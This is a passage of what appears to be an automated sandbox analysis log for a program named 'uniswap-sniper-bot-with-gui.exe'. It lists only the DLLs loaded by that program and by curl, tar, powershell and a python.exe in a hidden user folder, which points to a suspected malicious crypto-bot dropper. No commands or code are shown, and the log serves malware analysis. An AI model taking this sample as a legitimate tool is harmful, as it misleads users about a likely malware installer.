Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: windows.ui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: windowmanagementapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: mscms.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: coloradapterclient.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: windows.globalization.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: bcp47mrm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: msspellcheckingfacility.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: directmanipulation.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: uiautomationcore.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: mf.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: mfplat.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: rtworkq.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: msmpeg2vdec.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: mfperfhelper.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dxva2.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: msvproc.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dcomp.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: uiautomationcore.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: kbdus.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: uiautomationcore.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tar.exe	Section loaded: archiveint.dll
Source: C:\Windows\System32\tar.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\tar.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: uiautomationcore.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: kbdus.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: mf.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: mfplat.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: rtworkq.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: msmpeg2vdec.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: mfperfhelper.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dxva2.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: msvproc.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: d3d12.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: d3d12.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: d3d12core.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: dxilconv.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: d3dscache.dll
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: python311.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: version.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: libcrypto-1_1.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: libssl-1_1.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: libcrypto-1_1.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: mswsock.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: python311.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: version.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: libcrypto-1_1.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: libssl-1_1.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: mswsock.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: libffi-8.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: powrprof.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: pdh.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: umpdc.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: pywintypes311.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: vcruntime140_1.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: vcruntime140_1.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: pythoncom311.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: urlmon.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: iertutil.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: srvcli.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: netutils.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: msimg32.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: python311.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: version.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: libffi-8.dll
Source: C:\Users\user\.pyp\python.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
